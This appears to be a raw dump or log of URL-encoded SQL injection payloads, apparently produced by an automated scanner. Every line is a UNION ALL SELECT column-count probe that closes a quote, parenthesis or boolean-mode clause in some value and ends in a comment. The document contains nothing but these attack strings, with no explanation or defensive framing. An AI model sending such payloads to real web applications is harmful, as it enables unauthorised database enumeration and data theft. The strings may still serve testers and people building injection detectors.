1234.5%27%2B%28SELECT%20HIVN%20WHERE%207683%3D7683%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20Eaiv%20WHERE%206832%3D6832%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20HBPl%20WHERE%207461%3D7461%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20DUIh%20WHERE%205390%3D5390%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27iNWE%27%20WHERE%203215%3D3215%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27zKyT%27%20WHERE%203730%3D3730%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27ezjC%27%20WHERE%202977%3D2977%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27xUYA%27%20WHERE%202048%3D2048%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27JUZD%27%20WHERE%202311%3D2311%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27mnCo%27%20WHERE%208630%3D8630%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27ISjD%27%20WHERE%204585%3D4585%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27vdFI%27%20WHERE%202419%3D2419%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27nUOK%27%20WHERE%208288%3D8288%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27JOIP%27%20WHERE%207874%3D7874%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -9637%29%20UNION%20ALL%20SELECT%201107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107--%20 -6339%29%20UNION%20ALL%20SELECT%209869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869--%20 -7178%29%20UNION%20ALL%20SELECT%209196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196%2C9196--%20 -5575%29%20UNION%20ALL%20SELECT%202714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714--%20 -6971%29%20UNION%20ALL%20SELECT%208357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357%2C8357--%20 -2306%29%20UNION%20ALL%20SELECT%206165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165--%20 -7359%29%20UNION%20ALL%20SELECT%207715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715--%20 -6610%29%20UNION%20ALL%20SELECT%209888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888--%20 -4902%29%20UNION%20ALL%20SELECT%205867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867--%20 -4693%29%20UNION%20ALL%20SELECT%202772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772--%20 -1012%27%29%20UNION%20ALL%20SELECT%207822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822--%20 -1759%27%29%20UNION%20ALL%20SELECT%207244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244%2C7244--%20 -3336%27%29%20UNION%20ALL%20SELECT%207442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442--%20 -9460%27%29%20UNION%20ALL%20SELECT%208799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799--%20 -8013%27%29%20UNION%20ALL%20SELECT%207506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506--%20 -6880%27%29%20UNION%20ALL%20SELECT%203474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474--%20 -9732%27%29%20UNION%20ALL%20SELECT%207215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215--%20 -9554%27%29%20UNION%20ALL%20SELECT%204740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740--%20 -3487%27%29%20UNION%20ALL%20SELECT%202976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976--%20 -5745%27%29%20UNION%20ALL%20SELECT%202840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840--%20 -6480%27%20UNION%20ALL%20SELECT%207732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732--%20 -5786%27%20UNION%20ALL%20SELECT%203496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496%2C3496--%20 -3225%27%20UNION%20ALL%20SELECT%206780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780--%20 -7849%27%20UNION%20ALL%20SELECT%208154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154%2C8154--%20 -9106%27%20UNION%20ALL%20SELECT%208252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252--%20 -1890%27%20UNION%20ALL%20SELECT%203188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188%2C3188--%20 -8366%27%20UNION%20ALL%20SELECT%205717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717%2C5717--%20 -6251%27%20UNION%20ALL%20SELECT%209892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892%2C9892--%20 -2742%27%20UNION%20ALL%20SELECT%202200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200--%20 -3254%27%20UNION%20ALL%20SELECT%207619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619%2C7619--%20 -5168%22%20UNION%20ALL%20SELECT%204384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384%2C4384--%20 -9081%22%20UNION%20ALL%20SELECT%208523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523%2C8523--%20 -3446%22%20UNION%20ALL%20SELECT%204311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311--%20 -7265%22%20UNION%20ALL%20SELECT%208579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579%2C8579--%20 -5821%22%20UNION%20ALL%20SELECT%205708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708--%20 -1331%22%20UNION%20ALL%20SELECT%206587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587%2C6587--%20 -3488%22%20UNION%20ALL%20SELECT%206507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507%2C6507--%20 -5559%22%20UNION%20ALL%20SELECT%204663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663--%20 -8739%22%20UNION%20ALL%20SELECT%202636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636--%20 -9411%22%20UNION%20ALL%20SELECT%209083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083%2C9083--%20 -4338%29%20UNION%20ALL%20SELECT%204429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429--%20 -3491%29%20UNION%20ALL%20SELECT%201303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303%2C1303--%20 